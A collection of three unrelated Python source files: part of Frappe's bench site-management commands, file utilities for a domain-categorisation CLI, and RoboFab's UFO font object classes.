click.echo("Fix the issue and try again.")
click.echo(
"Hint: Use 'bench drop-site {s} --force' to force the removal of {s}".format(sep="\n", tab="\t", s=site)
)
sys.exit(1)
db_name = frappe.local.conf.db_name
frappe.local.db = get_root_connection(root_login, root_password)
dbman = DbManager(frappe.local.db)
dbman.delete_user(db_name)
dbman.drop_database(db_name)
if not archived_sites_path:
archived_sites_path = os.path.join(frappe.get_app_path('frappe'), '..', '..', '..', 'archived_sites')
if not os.path.exists(archived_sites_path):
os.mkdir(archived_sites_path)
move(archived_sites_path, site)
def move(dest_dir, site):
if not os.path.isdir(dest_dir):
raise Exception("destination is not a directory or does not exist")
frappe.init(site)
old_path = frappe.utils.get_site_path()
new_path = os.path.join(dest_dir, site)
# check if site dump of same name already exists
site_dump_exists = True
count = 0
while site_dump_exists:
final_new_path = new_path + (count and str(count) or "")
site_dump_exists = os.path.exists(final_new_path)
count = int(count or 0) + 1
os.rename(old_path, final_new_path)
frappe.destroy()
return final_new_path
@click.command('set-admin-password')
@click.argument('admin-password')
@click.option('--logout-all-sessions', help='Logout from all sessions', is_flag=True, default=False)
@pass_context
def set_admin_password(context, admin_password, logout_all_sessions=False):
"Set Administrator password for a site"
import getpass
from frappe.utils.password import update_password
for site in context.sites:
try:
frappe.init(site=site)
while not admin_password:
admin_password = getpass.getpass("Administrator's password for {0}: ".format(site))
frappe.connect()
update_password(user='Administrator', pwd=admin_password, logout_all_sessions=logout_all_sessions)
frappe.db.commit()
admin_password = None
finally:
frappe.destroy()
@click.command('set-limit')
@click.option('--site', help='site name')
@click.argument('limit')
@click.argument('value')
@pass_context
def set_limit(context, site, limit, value):
"""Sets user / space / email limit for a site"""
_set_limits(context, site, ((limit, value),))
@click.command('set-limits')
@click.option('--site', help='site name')
@click.option('--limit', 'limits', type=(text_type, text_type), multiple=True)
@pass_context
def set_limits(context, site, limits):
_set_limits(context, site, limits)
def _set_limits(context, site, limits):
import datetime
if not limits:
return
if not site:
site = get_site(context)
with frappe.init_site(site):
frappe.connect()
new_limits = {}
for limit, value in limits:
if limit not in ('daily_emails', 'emails', 'space', 'users', 'email_group', 'currency',
'expiry', 'support_email', 'support_chat', 'upgrade_url', 'subscription_id',
'subscription_type', 'current_plan', 'subscription_base_price', 'upgrade_plan',
'upgrade_base_price', 'cancellation_url'):
frappe.throw(_('Invalid limit {0}').format(limit))
if limit=='expiry' and value:
try:
datetime.datetime.strptime(value, '%Y-%m-%d')
except ValueError:
raise ValueError("Incorrect data format, should be YYYY-MM-DD")
elif limit in ('space', 'subscription_base_price', 'upgrade_base_price'):
value = float(value)
elif limit in ('users', 'emails', 'email_group', 'daily_emails'):
value = int(value)
new_limits[limit] = value
update_limits(new_limits)
@click.command('clear-limits')
@click.option('--site', help='site name')
@click.argument('limits', nargs=-1, type=click.Choice(['emails', 'space', 'users', 'email_group',
'expiry', 'support_email', 'support_chat', 'upgrade_url', 'daily_emails', 'cancellation_url']))
@pass_context
def clear_limits(context, site, limits):
"""Clears given limit from the site config, and removes limit from site config if its empty"""
from frappe.limits import clear_limit as _clear_limit
if not limits:
return
if not site:
site = get_site(context)
with frappe.init_site(site):
_clear_limit(limits)
# Remove limits from the site_config, if it's empty
limits = get_limits()
if not limits:
update_site_config('limits', 'None', validate=False)
@click.command('set-last-active-for-user')
@click.option('--user', help="Setup last active date for user")
@pass_context
def set_last_active_for_user(context, user=None):
"Set users last active date to current datetime"
from frappe.core.doctype.user.user import get_system_users
from frappe.utils.user import set_last_active_to_now
site = get_site(context)
with frappe.init_site(site):
frappe.connect()
if not user:
user = get_system_users(limit=1)
if len(user) > 0:
user = user[0]
else:
return
set_last_active_to_now(user)
frappe.db.commit()
@click.command('publish-realtime')
@click.argument('event')
@click.option('--message')
@click.option('--room')
@click.option('--user')
@click.option('--doctype')
@click.option('--docname')
@click.option('--after-commit')
@pass_context
def publish_realtime(context, event, message, room, user, doctype, docname, after_commit):
"Publish realtime event from bench"
from frappe import publish_realtime
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
publish_realtime(event, message=message, room=room, user=user, doctype=doctype, docname=docname,
after_commit=after_commit)
frappe.db.commit()
finally:
frappe.destroy()
commands = [
add_system_manager,
backup,
drop_site,
install_app,
list_apps,
migrate,
new_site,
reinstall,
reload_doc,
reload_doctype,
remove_from_installed_apps,
restore,
run_patch,
set_admin_password,
uninstall,
set_limit,
set_limits,
clear_limits,
disable_user,
_use,
set_last_active_for_user,
publish_realtime,
]
|
|
import glob
import os
import sys
import click
from wcategory.conf import DOMAINS_FILE, INPUT_DIR, OUTPUT_DIR, CONF_DIR, CONF_EXTENSION
def write_file(path, string, mode):
file = open(path, mode)
file.write(string)
file.close()
def write_lines(path, lines):
file = open(path, "w")
for line in lines:
file.write(line)
file.close()
def read_file(path):
if os.path.exists(path):
file = open(path, "r")
content = file.read()
file.close()
return content
else:
print_not_found_message(path)
return ""
def read_lines(path):
if os.path.exists(path):
file = open(path, "r")
lines = file.readlines()
file.close()
return lines
else:
print_not_found_message(path)
return []
def remove_line(path, line_to_remove):
lines = read_lines(path)
if lines:
file = open(path, "w")
for line in lines:
line = remove_line_feed(line)
if line != line_to_remove:
file.write(line + "\n")
file.close()
def create_directory(path):
if not os.path.exists(path):
os.makedirs(path)
click.secho("Created directory {}".format(path), fg="green")
def remove_directory(path):
import shutil
if os.path.exists(path):
shutil.rmtree(path)
click.secho("Removed directory {}".format(path), fg="green")
def get_working_directory():
return os.getcwd()
def fix_path(path):
"""
Removes slash at the end and the beginning
"""
try:
if path[0] == "/" or path[0] == "\/":
path = path[1:]
if path[-1] == "/" or path[-1] == "\/":
path = path[:-1]
return path
except IndexError:
print_unexpected_path_exit(path)
def get_file_name(file_path):
base_name = os.path.basename(file_path)
return os.path.splitext(base_name)[0]
def find_domain_files(path=None):
if path:
path_pattern = "{}/{}".format(path, DOMAINS_FILE)
else:
path_pattern = "**/{}".format(DOMAINS_FILE)
return glob.glob(path_pattern, recursive=True)
def find_conf_files(exclude=None, service=None):
if service:
path_pattern = "{}/{}{}".format(CONF_DIR, service, CONF_EXTENSION)
else:
path_pattern = "{}/**{}".format(CONF_DIR, CONF_EXTENSION)
conf_files = glob.glob(path_pattern)
if exclude:
return [conf for conf in conf_files if conf not in exclude]
return conf_files
def find_add_remove_conf_files(prefix):
path_pattern = "{}/{}**{}".format(CONF_DIR, prefix, CONF_EXTENSION)
return glob.glob(path_pattern)
def search_text_in_files(text, files):
found = False
counter = 0
for file in files:
lines = read_lines(file)
for index, line in enumerate(lines):
if text.lower() in line.lower():
print_found_message(remove_line_feed(line), index + 1, file)
found = True
counter += 1
print_found_count(text, counter)
if not found:
print_not_found_message(text)
def print_found_message(line_text, line_number, file):
message = "\"{}\" is found at line {} in file \"{}\"".format(line_text, line_number, file)
click.secho(message, fg="green")
def print_not_found_message(line_text):
message = "\"{}\" is not found".format(line_text)
click.secho(message, fg="red")
def print_found_count(text, count):
message = "Searched text \"{}\" found {} times".format(text, count)
click.secho(message, fg="blue")
def print_unique_count(path, count):
message = "Sorted and uniquified {} domains under {}".format(count, path)
click.secho(message, fg="green")
def print_unexpected_path_exit(path):
message = "\"{}\" is not a valid path. Please, remove or edit it".format(path)
click.secho(message, fg="red")
sys.exit()
def create_necessary_files():
necessary_files = [INPUT_DIR, OUTPUT_DIR, CONF_DIR]
for file in necessary_files:
create_directory(file)
def check_environment():
input_dir_exists = os.path.exists(INPUT_DIR)
output_dir_exists = os.path.exists(OUTPUT_DIR)
conf_dir_exists = os.path.exists(CONF_DIR)
if not (input_dir_exists and output_dir_exists and conf_dir_exists):
click.secho("You should first run \"init\" command", fg="red")
sys.exit()
def requires_environment_check(function):
def check_environment_and_execute(*args, **kwargs):
check_environment()
function()
return check_environment_and_execute
def exit_if_no(ctx, param, value):
"""
Callback for yes/no option, exits if user's answer is no
"""
if not value:
sys.exit()
def sort_uniquify_lines(path, echo=True):
lines = read_lines(path)
unique_lines = set(lines)
sorted_lines = sorted(unique_lines)
if echo:
count = len(sorted_lines)
print_unique_count(path, count)
write_lines(path, sorted_lines)
return lines
def map_domains_to_path(domain_files, map_path):
"""
Moves domains under domain_files to map_path
"""
content = ""
message = "Mapping to {}".format(map_path)
with click.progressbar(domain_files, label=message) as domain_files:
for file in domain_files:
content += read_file(file)
content = fix_content_to_append(content)
create_directory(map_path)
path_to_write = "{}/{}".format(map_path, DOMAINS_FILE)
write_file(path_to_write, content, "a+")
sort_uniquify_lines(path_to_write)
def remove_line_feed(line):
if line[-1] == "\n":
return line[:-1]
return line
def parse_map(command):
parsed = command.split(" ")
return tuple(parsed[:2]), [exclude[1:] for exclude in parsed[2:]]
def parse_add_remove(command):
return command.split(" ")[1:3]
def check_prefix(prefix, line):
try:
return line[0] == prefix
except IndexError:
return False
def invoke_map_commands(command_function, file, prefix):
"""
Invokes cli's map command for conf files
"""
service = get_file_name(file)
lines = read_lines(file)
for line in lines:
if check_prefix(prefix, line):
line = remove_line_feed(line)
args = parse_map(line)
category_paths, exclude_path = args[0], args[1]
command_function(service, *category_paths, exclude_path)
def invoke_add_remove_commands(command_function, file, prefix):
"""
Invokes cli's add/remove command for conf files
"""
lines = read_lines(file)
for line in lines:
if check_prefix(prefix, line):
line = remove_line_feed(line)
args = parse_add_remove(line)
command_function(*args)
def fix_content_to_append(content):
"""
Needed when appending files
If there is no line feed at the end of content, adds line feed at the end
"""
if content:
if content[-1] != "\n":
content += "\n"
return content
def fix_file_to_append(path, content_to_add):
"""
Needed when appending files
If there is no line feed at end of file, adds line feed at the beginning of content
"""
content_to_check = read_file(path)
if content_to_check:
if content_to_check[-1] != "\n":
content_to_add = "\n" + content_to_add
return content_to_add
def save_map_command_to_conf(service, category_path, map_category_path, exclude_path):
line_wo_exclude = "/{} /{}\n".format(fix_path(category_path), fix_path(map_category_path))
line_to_save = save_map_exclude_to_conf(line_wo_exclude, exclude_path)
conf_file_path = "{}/{}{}".format(CONF_DIR, service, CONF_EXTENSION)
line_to_save = fix_file_to_append(conf_file_path, line_to_save)
write_file(conf_file_path, line_to_save, "a+")
def save_add_remove_command_to_conf(domain, category_path, prefix, file_prefix):
line_to_save = "{} {} /{}\n".format(prefix, domain, fix_path(category_path))
conf_file_path = "{}/{}{}".format(CONF_DIR, file_prefix, CONF_EXTENSION)
line_to_save = fix_file_to_append(conf_file_path, line_to_save)
write_file(conf_file_path, line_to_save, "a+")
def save_map_exclude_to_conf(line_to_save, exclude_path):
if exclude_path:
line_to_save = line_to_save[:-1]
for path in exclude_path:
line_to_save += " -/{}".format(fix_path(path))
line_to_save += "\n"
return line_to_save
def exclude_domain(domain_files, directory_path, exclude_path):
excluded_domain_files = []
if exclude_path:
for path in exclude_path:
if directory_path[-1] == "*" and directory_path[-2] == "*":
directory_path = directory_path[:-3]
exclude_directory_path = "{}/{}".format(directory_path, fix_path(path))
excluded_domain_files.extend(find_domain_files(exclude_directory_path))
return [domain_file for domain_file in domain_files if domain_file not in excluded_domain_files]
|
|
"""UFO for GlifLib"""
from robofab import RoboFabError, RoboFabWarning
from robofab.objects.objectsBase import BaseFont, BaseKerning, BaseGroups, BaseInfo, BaseFeatures, BaseLib,\
BaseGlyph, BaseContour, BaseSegment, BasePoint, BaseBPoint, BaseAnchor, BaseGuide, BaseComponent, \
relativeBCPIn, relativeBCPOut, absoluteBCPIn, absoluteBCPOut, _box,\
_interpolate, _interpolatePt, roundPt, addPt,\
MOVE, LINE, CORNER, CURVE, QCURVE, OFFCURVE,\
BasePostScriptFontHintValues, postScriptHintDataLibKey, BasePostScriptGlyphHintValues
import os
__all__ = [ "CurrentFont",
"CurrentGlyph", 'OpenFont',
'RFont', 'RGlyph', 'RContour',
'RPoint', 'RBPoint', 'RAnchor',
'RComponent'
]
def CurrentFont():
return None
def CurrentGlyph():
return None
def OpenFont(path=None, note=None):
"""Open a font from a path. If path is not given, present the user with a dialog."""
if not note:
note = 'select a .ufo directory'
if not path:
from robofab.interface.all.dialogs import GetFolder
path = GetFolder(note)
if path:
try:
return RFont(path)
except OSError:
from robofab.interface.all.dialogs import Message
Message("%s is not a valid .UFO font. But considering it's all XML, why don't you have a look inside with a simple text editor."%(path))
else:
return None
def NewFont(familyName=None, styleName=None):
"""Make a new font"""
new = RFont()
if familyName is not None:
new.info.familyName = familyName
if styleName is not None:
new.info.styleName = styleName
return new
def AllFonts():
"""AllFonts can't work in plain python usage. It's really up to some sort of application
to keep track of which fonts are open."""
raise NotImplementedError
class PostScriptFontHintValues(BasePostScriptFontHintValues):
""" Font level PostScript hints object for objectsRF usage.
If there are values in the lib, use those.
If there are no values in the lib, use defaults.
The psHints attribute for objectsRF.RFont is basically just the
data read from the Lib. When the object saves to UFO, the
hints are written back to the lib, which is then saved.
"""
def __init__(self, aFont=None, data=None):
self.setParent(aFont)
BasePostScriptFontHintValues.__init__(self)
if aFont is not None:
# in version 1, this data was stored in the lib
# if it is still there, guess that it is correct
# move it to font info and remove it from the lib.
libData = aFont.lib.get(postScriptHintDataLibKey)
if libData is not None:
self.fromDict(libData)
del libData[postScriptHintDataLibKey]
if data is not None:
self.fromDict(data)
def getPostScriptHintDataFromLib(aFont, fontLib):
hintData = fontLib.get(postScriptHintDataLibKey)
psh = PostScriptFontHintValues(aFont)
psh.fromDict(hintData)
return psh
class PostScriptGlyphHintValues(BasePostScriptGlyphHintValues):
""" Glyph level PostScript hints object for objectsRF usage.
If there are values in the lib, use those.
If there are no values in the lib, be empty.
"""
def __init__(self, aGlyph=None, data=None):
# read the data from the glyph.lib, it won't be anywhere else
BasePostScriptGlyphHintValues.__init__(self)
if aGlyph is not None:
self.setParent(aGlyph)
self._loadFromLib(aGlyph.lib)
if data is not None:
self.fromDict(data)
class RFont(BaseFont):
"""UFO font object which reads and writes glif, and keeps the data in memory in between.
Bahviour:
- comparable to Font
- comparable to GlyphSet so that it can be passed to Glif widgets
"""
_title = "RoboFabFont"
def __init__(self, path=None):
BaseFont.__init__(self)
if path is not None:
self._path = os.path.normpath(os.path.abspath(path))
else:
self._path = None
self._object = {}
self._glyphSet = None
self._scheduledForDeletion = [] # this is a place for storing glyphs that need to be removed when the font is saved
self.kerning = RKerning()
self.kerning.setParent(self)
self.info = RInfo()
self.info.setParent(self)
self.features = RFeatures()
self.features.setParent(self)
self.groups = RGroups()
self.groups.setParent(self)
self.lib = RLib()
self.lib.setParent(self)
if path:
self._loadData(path)
else:
self.psHints = PostScriptFontHintValues(self)
self.psHints.setParent(self)
def __setitem__(self, glyphName, glyph):
"""Set a glyph at key."""
self._object[glyphName] = glyph
def __cmp__(self, other):
"""Compare this font with another, compare if they refer to the same file."""
if not hasattr(other, '_path'):
return -1
if self._object._path == other._object._path and self._object._path is not None:
return 0
else:
return -1
def __len__(self):
if self._glyphSet is None:
return 0
return len(self._glyphSet)
def _loadData(self, path):
from robofab.ufoLib import UFOReader
reader = UFOReader(path)
fontLib = reader.readLib()
# info
reader.readInfo(self.info)
# kerning
self.kerning.update(reader.readKerning())
self.kerning.setChanged(False)
# groups
self.groups.update(reader.readGroups())
# features
if reader.formatVersion == 1:
# migrate features from the lib
features = []
classes = fontLib.get("org.robofab.opentype.classes")
if classes is not None:
del fontLib["org.robofab.opentype.classes"]
features.append(classes)
splitFeatures = fontLib.get("org.robofab.opentype.features")
if splitFeatures is not None:
order = fontLib.get("org.robofab.opentype.featureorder")
if order is None:
order = splitFeatures.keys()
order.sort()
else:
del fontLib["org.robofab.opentype.featureorder"]
del fontLib["org.robofab.opentype.features"]
for tag in order:
oneFeature = splitFeatures.get(tag)
if oneFeature is not None:
features.append(oneFeature)
features = "\n".join(features)
else:
features = reader.readFeatures()
self.features.text = features
# hint data
self.psHints = PostScriptFontHintValues(self)
if postScriptHintDataLibKey in fontLib:
del fontLib[postScriptHintDataLibKey]
# lib
self.lib.update(fontLib)
# glyphs
self._glyphSet = reader.getGlyphSet()
self._hasNotChanged(doGlyphs=False)
def _loadGlyph(self, glyphName):
"""Load a single glyph from the glyphSet, on request."""
from robofab.pens.rfUFOPen import RFUFOPointPen
g = RGlyph()
g.name = glyphName
pen = RFUFOPointPen(g)
self._glyphSet.readGlyph(glyphName=glyphName, glyphObject=g, pointPen=pen)
g.setParent(self)
g.psHints._loadFromLib(g.lib)
self._object[glyphName] = g
self._object[glyphName]._hasNotChanged()
return g
#def _prepareSaveDir(self, dir):
# path = os.path.join(dir, 'glyphs')
# if not os.path.exists(path):
# os.makedirs(path)
def _hasNotChanged(self, doGlyphs=True):
#set the changed state of the font
if doGlyphs:
for glyph in self:
glyph._hasNotChanged()
self.setChanged(False)
#
# attributes
#
def _get_path(self):
return self._path
path = property(_get_path, doc="path of the font")
#
# methods for imitating GlyphSet?
#
def keys(self):
# the keys are the superset of self._objects.keys() and
# self._glyphSet.keys(), minus self._scheduledForDeletion
keys = self._object.keys()
if self._glyphSet is not None:
keys.extend(self._glyphSet.keys())
d = dict()
for glyphName in keys:
d[glyphName] = None
for glyphName in self._scheduledForDeletion:
if glyphName in d:
del d[glyphName]
return d.keys()
def has_key(self, glyphName):
# XXX ditto, see above.
if self._glyphSet is not None:
hasGlyph = glyphName in self._object or glyphName in self._glyphSet
else:
hasGlyph = glyphName in self._object
return hasGlyph and not glyphName in self._scheduledForDeletion
__contains__ = has_key
def getWidth(self, glyphName):
if self._object.has_key(glyphName):
return self._object[glyphName].width
raise IndexError # or return None?
def getReverseComponentMapping(self):
"""
Get a reversed map of component references in the font.
{
'A' : ['Aacute', 'Aring']
'acute' : ['Aacute']
'ring' : ['Aring']
etc.
}
"""
# a NON-REVERESED map is stored in the lib.
# this is done because a reveresed map could
# contain faulty data. for example: "Aacute" contains
# a component that references "A". Glyph "Aacute" is
# then deleted. The reverse map would still say that
# "A" is referenced by "Aacute" even though the
# glyph has been deleted. So, the stored lib works like this:
# {
# 'Aacute' : [
# # the last known mod time of the GLIF
# 1098706856.75,
# # component references in a glyph
# ['A', 'acute']
# ]
# }
import time
import os
import re
componentSearch_RE = re.compile(
"<component\s+" # <component
"[^>]*?" # anything EXCEPT >
"base\s*=\s*[\"\']" # base="
"(.*?)" # foo
"[\"\']" # "
)
rightNow = time.time()
libKey = "org.robofab.componentMapping"
previousMap = None
if self.lib.has_key(libKey):
previousMap = self.lib[libKey]
basicMap = {}
reverseMap = {}
for glyphName in self.keys():
componentsToMap = None
modTime = None
# get the previous bits of data
previousModTime = None
previousList = None
if previousMap is not None and previousMap.has_key(glyphName):
previousModTime, previousList = previousMap[glyphName]
# the glyph has been loaded.
# simply get the components from it.
if self._object.has_key(glyphName):
componentsToMap = [component.baseGlyph for component in self._object[glyphName].components]
# the glyph has not been loaded.
else:
glyphPath = os.path.join(self._glyphSet.dirName, self._glyphSet.contents[glyphName])
scanGlyph = True
# test the modified time of the GLIF
fileModTime = os.path.getmtime(glyphPath)
if previousModTime is not None and fileModTime == previousModTime:
# the GLIF almost* certianly has not changed.
# *theoretically, a user could replace a GLIF
# with another GLIF that has precisely the same
# mod time.
scanGlyph = False
componentsToMap = previousList
modTime = previousModTime
else:
# the GLIF is different
modTime = fileModTime
if scanGlyph:
# use regex to extract component
# base glyphs from the file
f = open(glyphPath, 'rb')
data = f.read()
f.close()
componentsToMap = componentSearch_RE.findall(data)
if componentsToMap is not None:
# store the non-reversed map
basicMap[glyphName] = (modTime, componentsToMap)
# reverse the map for the user
if componentsToMap:
for baseGlyphName in componentsToMap:
if not reverseMap.has_key(baseGlyphName):
reverseMap[baseGlyphName] = []
reverseMap[baseGlyphName].append(glyphName)
# if a glyph has been loaded, we do not store data about it in the lib.
# this is done becuase there is not way to determine the proper mod time
# for a loaded glyph.
if modTime is None:
del basicMap[glyphName]
# store the map in the lib for re-use
self.lib[libKey] = basicMap
return reverseMap
def save(self, destDir=None, doProgress=False, formatVersion=2):
"""Save the Font in UFO format."""
# XXX note that when doing "save as" by specifying the destDir argument
# _all_ glyphs get loaded into memory. This could be optimized by either
# copying those .glif files that have not been edited or (not sure how
# well that would work) by simply clearing out self._objects after the
# save.
from robofab.ufoLib import UFOWriter
from robofab.tools.fontlabFeatureSplitter import splitFeaturesForFontLab
# if no destination is given, or if
# the given destination is the current
# path, this is not a save as operation
if destDir is None or destDir == self._path:
saveAs = False
destDir = self._path
else:
saveAs = True
# start a progress bar
nonGlyphCount = 5
bar = None
if doProgress:
from robofab.interface.all.dialogs import ProgressBar
bar = ProgressBar("Exporting UFO", nonGlyphCount + len(self._object.keys()))
# write
writer = UFOWriter(destDir, formatVersion=formatVersion)
try:
# make a shallow copy of the lib. stuff may be added to it.
fontLib = dict(self.lib)
# info
if bar:
bar.label("Saving info...")
writer.writeInfo(self.info)
if bar:
bar.tick()
# kerning
if self.kerning.changed or saveAs:
if bar:
bar.label("Saving kerning...")
writer.writeKerning(self.kerning.asDict())
if bar:
bar.tick()
# groups
if bar:
bar.label("Saving groups...")
writer.writeGroups(self.groups)
if bar:
bar.tick()
# features
if bar:
bar.label("Saving features...")
features = self.features.text
if features is None:
features = ""
if formatVersion == 2:
writer.writeFeatures(features)
elif formatVersion == 1:
classes, features = splitFeaturesForFontLab(features)
if classes:
fontLib["org.robofab.opentype.classes"] = classes.strip() + "\n"
if features:
featureDict = {}
for featureName, featureText in features:
featureDict[featureName] = featureText.strip() + "\n"
fontLib["org.robofab.opentype.features"] = featureDict
fontLib["org.robofab.opentype.featureorder"] = [featureName for featureName, featureText in features]
if bar:
bar.tick()
# lib
if formatVersion == 1:
fontLib[postScriptHintDataLibKey] = self.psHints.asDict()
if bar:
bar.label("Saving lib...")
writer.writeLib(fontLib)
if bar:
bar.tick()
# glyphs
glyphNameToFileNameFunc = self.getGlyphNameToFileNameFunc()
glyphSet = writer.getGlyphSet(glyphNameToFileNameFunc)
if len(self._scheduledForDeletion) != 0:
if bar:
bar.label("Removing deleted glyphs...")
for glyphName in self._scheduledForDeletion:
if glyphSet.has_key(glyphName):
glyphSet.deleteGlyph(glyphName)
if bar:
bar.tick()
if bar:
bar.label("Saving glyphs...")
count = nonGlyphCount
if saveAs:
glyphNames = self.keys()
else:
glyphNames = self._object.keys()
for glyphName in glyphNames:
glyph = self[glyphName]
glyph.psHints._saveToLib(glyph.lib)
glyph._saveToGlyphSet(glyphSet, glyphName=glyphName, force=saveAs)
if bar and not count % 10:
bar.tick(count)
count = count + 1
glyphSet.writeContents()
self._glyphSet = glyphSet
# only blindly stop if the user says to
except KeyboardInterrupt:
bar.close()
bar = None
# kill the progress bar
if bar:
bar.close()
# reset internal stuff
self._path = destDir
self._scheduledForDeletion = []
self.setChanged(False)
def newGlyph(self, glyphName, clear=True):
"""Make a new glyph with glyphName
if the glyph exists and clear=True clear the glyph"""
if clear and glyphName in self:
g = self[glyphName]
g.clear()
w = self.info.postscriptDefaultWidthX
if w is None:
w = 0
g.width = w
return g
g = RGlyph()
g.setParent(self)
g.name = glyphName
w = self.info.postscriptDefaultWidthX
if w is None:
w = 0
g.width = w
g._hasChanged()
self._object[glyphName] = g
# is the user adding a glyph that has the same
# name as one that was deleted earlier?
if glyphName in self._scheduledForDeletion:
self._scheduledForDeletion.remove(glyphName)
return self.getGlyph(glyphName)
def insertGlyph(self, glyph, name=None):
"""returns a new glyph that has been inserted into the font"""
if name is None:
name = glyph.name
glyph = glyph.copy()
glyph.name = name
glyph.setParent(self)
glyph._hasChanged()
self._object[name] = glyph
# is the user adding a glyph that has the same
# name as one that was deleted earlier?
if name in self._scheduledForDeletion:
self._scheduledForDeletion.remove(name)
return self.getGlyph(name)
def removeGlyph(self, glyphName):
"""remove a glyph from the font"""
# XXX! Potential issue with removing glyphs.
# if a glyph is removed from a font, but it is still referenced
# by a component, it will give pens some trouble.
# where does the resposibility for catching this fall?
# the removeGlyph method? the addComponent method
# of the various pens? somewhere else? hm... tricky.
#
#we won't actually remove it, we will just store it for removal
# but only if the glyph does exist
if self.has_key(glyphName) and glyphName not in self._scheduledForDeletion:
self._scheduledForDeletion.append(glyphName)
# now delete the object
if self._object.has_key(glyphName):
del self._object[glyphName]
self._hasChanged()
def getGlyph(self, glyphName):
# XXX getGlyph may have to become private, to avoid duplication
# with __getitem__
n = None
if self._object.has_key(glyphName):
# have we served this glyph before? it should be in _object
n = self._object[glyphName]
else:
# haven't served it before, is it in the glyphSet then?
if self._glyphSet is not None and glyphName in self._glyphSet:
# yes, read the .glif file from disk
n = self._loadGlyph(glyphName)
if n is None:
raise KeyError, glyphName
return n
class RGlyph(BaseGlyph):
_title = "RGlyph"
def __init__(self):
BaseGlyph.__init__(self)
self.contours = []
self.components = []
self.anchors = []
self._unicodes = []
self.width = 0
self.note = None
self._name = "Unnamed Glyph"
self.selected = False
self._properties = None
self._lib = RLib()
self._lib.setParent(self)
self.psHints = PostScriptGlyphHintValues()
self.psHints.setParent(self)
def __len__(self):
return len(self.contours)
def __getitem__(self, index):
if index < len(self.contours):
return self.contours[index]
raise IndexError
def _hasNotChanged(self):
for contour in self.contours:
contour.setChanged(False)
for segment in contour.segments:
segment.setChanged(False)
for point in segment.points:
point.setChanged(False)
for component in self.components:
component.setChanged(False)
for anchor in self.anchors:
anchor.setChanged(False)
self.setChanged(False)
#
# attributes
#
def _get_lib(self):
return self._lib
def _set_lib(self, obj):
self._lib.clear()
self._lib.update(obj)
lib = property(_get_lib, _set_lib)
def _get_name(self):
return self._name
def _set_name(self, value):
prevName = self._name
newName = value
if newName == prevName:
return
self._name = newName
self.setChanged(True)
font = self.getParent()
if font is not None:
# but, this glyph could be linked to a
# FontLab font, because objectsFL.RGlyph.copy()
# creates an objectsRF.RGlyph with the parent
# set to an objectsFL.RFont object. so, check to see
# if this is a legitimate RFont before trying to
# do the objectsRF.RFont glyph name change
if isinstance(font, RFont):
font._object[newName] = self
# is the user changing a glyph's name to the
# name of a glyph that was deleted earlier?
if newName in font._scheduledForDeletion:
font._scheduledForDeletion.remove(newName)
font.removeGlyph(prevName)
name = property(_get_name, _set_name)
def _get_unicodes(self):
return self._unicodes
def _set_unicodes(self, value):
if not isinstance(value, list):
raise RoboFabError, "unicodes must be a list"
self._unicodes = value
self._hasChanged()
unicodes = property(_get_unicodes, _set_unicodes, doc="all unicode values for the glyph")
def _get_unicode(self):
if len(self._unicodes) == 0:
return None
return self._unicodes[0]
def _set_unicode(self, value):
uni = self._unicodes
if value is not None:
if value not in uni:
self.unicodes.insert(0, value)
elif uni.index(value) != 0:
uni.insert(0, uni.pop(uni.index(value)))
self.unicodes = uni
unicode = property(_get_unicode, _set_unicode, doc="first unicode value for the glyph")
def getPointPen(self):
from robofab.pens.rfUFOPen import RFUFOPointPen
return RFUFOPointPen(self)
def appendComponent(self, baseGlyph, offset=(0, 0), scale=(1, 1)):
"""append a component to the glyph"""
new = RComponent(baseGlyph, offset, scale)
new.setParent(self)
self.components.append(new)
self._hasChanged()
def appendAnchor(self, name, position, mark=None):
"""append an anchor to the glyph"""
new = RAnchor(name, position, mark)
new.setParent(self)
self.anchors.append(new)
self._hasChanged()
def removeContour(self, index):
"""remove a specific contour from the glyph"""
del self.contours[index]
self._hasChanged()
def removeAnchor(self, anchor):
"""remove a specific anchor from the glyph"""
del self.anchors[anchor.index]
self._hasChanged()
def removeComponent(self, component):
"""remove a specific component from the glyph"""
del self.components[component.index]
self._hasChanged()
def center(self, padding=None):
"""Equalise sidebearings, set to padding if wanted."""
left = self.leftMargin
right = self.rightMargin
if padding:
e_left = e_right = padding
else:
e_left = (left + right)/2
e_right = (left + right) - e_left
self.leftMargin = e_left
self.rightMargin = e_right
def decompose(self):
"""Decompose all components"""
for i in range(len(self.components)):
self.components[-1].decompose()
self._hasChanged()
def clear(self, contours=True, components=True, anchors=True, guides=True):
"""Clear all items marked as True from the glyph"""
if contours:
self.clearContours()
if components:
self.clearComponents()
if anchors:
self.clearAnchors()
if guides:
self.clearHGuides()
self.clearVGuides()
def clearContours(self):
"""clear all contours"""
self.contours = []
self._hasChanged()
def clearComponents(self):
"""clear all components"""
self.components = []
self._hasChanged()
def clearAnchors(self):
"""clear all anchors"""
self.anchors = []
self._hasChanged()
def clearHGuides(self):
"""clear all horizontal guides"""
self.hGuides = []
self._hasChanged()
def clearVGuides(self):
"""clear all vertical guides"""
self.vGuides = []
self._hasChanged()
def getAnchors(self):
return self.anchors
def getComponents(self):
return self.components
#
# stuff related to Glyph Properties
#
class RContour(BaseContour):
_title = "RoboFabContour"
def __init__(self, object=None):
#BaseContour.__init__(self)
self.segments = []
self.selected = False
def __len__(self):
return len(self.segments)
def __getitem__(self, index):
if index < len(self.segments):
return self.segments[index]
raise IndexError
def _get_index(self):
return self.getParent().contours.index(self)
def _set_index(self, index):
ogIndex = self.index
if index != ogIndex:
contourList = self.getParent().contours
contourList.insert(index, contourList.pop(ogIndex))
index = property(_get_index, _set_index, doc="index of the contour")
def _get_points(self):
points = []
for segment in self.segments:
for point in segment.points:
points.append(point)
return points
points = property(_get_points, doc="view the contour as a list of points")
def _get_bPoints(self):
bPoints = []
for segment in self.segments:
segType = segment.type
if segType == MOVE:
bType = CORNER
elif segType == LINE:
bType = CORNER
elif segType == CURVE:
if segment.smooth:
bType = CURVE
else:
bType = CORNER
else:
raise RoboFabError, "encountered unknown segment type"
b = RBPoint()
b.setParent(segment)
bPoints.append(b)
return bPoints
bPoints = property(_get_bPoints, doc="view the contour as a list of bPoints")
def appendSegment(self, segmentType, points, smooth=False):
"""append a segment to the contour"""
segment = self.insertSegment(index=len(self.segments), segmentType=segmentType, points=points, smooth=smooth)
return segment
def insertSegment(self, index, segmentType, points, smooth=False):
"""insert a segment into the contour"""
segment = RSegment(segmentType, points, smooth)
segment.setParent(self)
self.segments.insert(index, segment)
self._hasChanged()
return segment
def removeSegment(self, index):
"""remove a segment from the contour"""
del self.segments[index]
self._hasChanged()
